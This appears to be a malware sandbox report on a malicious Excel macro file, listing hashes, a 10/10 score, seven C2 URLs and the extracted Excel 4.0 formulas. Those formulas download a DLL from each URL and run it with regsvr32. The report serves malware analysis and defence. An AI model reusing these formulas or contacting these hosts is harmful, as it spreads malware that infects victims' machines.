Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

6d1abb36be...c.xlsm

windows7-x64

10

6d1abb36be...c.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    6d1abb36bed75fcede73b8b49c875f0fac0c3ecd2471b8ec51f582553fdd340c

  • Size

    20KB

  • MD5

    4c80c2bfa68008173f8bf1347ad0b32e

  • SHA1

    6d769fdcaa2a3c32f66df1f84100ee7aef89955b

  • SHA256

    6d1abb36bed75fcede73b8b49c875f0fac0c3ecd2471b8ec51f582553fdd340c

  • SHA512

    b302fe8b570a4c1d5d5b35d7cfdbeee9054c7771372b87a480d4080b8a57d0e48c0fb6f3f9515247dbffb242fc9f2233b79ece9556d082e6c41daa2a432cf2d6

  • SSDEEP

    384:iHM0Vb1GNjDo4CGzPd6ZIwA1hKb5CzgObff9kC+xbX7qE7h:X0INfo4FLH2CBn9kC+xbLq+

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/

http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/

http://www.cafe-kwebbel.nl/layouts/3Wkev/

http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/

http://borbajardinagem.com.br/erros/vlB3f6XpsZG/

http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/

http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://canismallorca.es/wp-admin/OTyeYrx9C9BvYvVb3/","..\kytk.dll",0,0) =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://capslock.co.za/wp-includes/LMngUUTuanBofr5zK/","..\kytk.dll",0,0)) =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cafe-kwebbel.nl/layouts/3Wkev/","..\kytk.dll",0,0)) =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bkps.ac.th/b91-std63/Ixv52m8gu4aaUiyb/","..\kytk.dll",0,0)) =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://borbajardinagem.com.br/erros/vlB3f6XpsZG/","..\kytk.dll",0,0)) =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.best-design.gr/_errorpages/9wCa7GLI0cl6nM/","..\kytk.dll",0,0)) =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://belleile-do.fr/diapo-ile/EeBHyfGoKYACY/","..\kytk.dll",0,0)) =IF('SCWVCV'!D26<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll") =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • 6d1abb36bed75fcede73b8b49c875f0fac0c3ecd2471b8ec51f582553fdd340c
    .xlsm office2007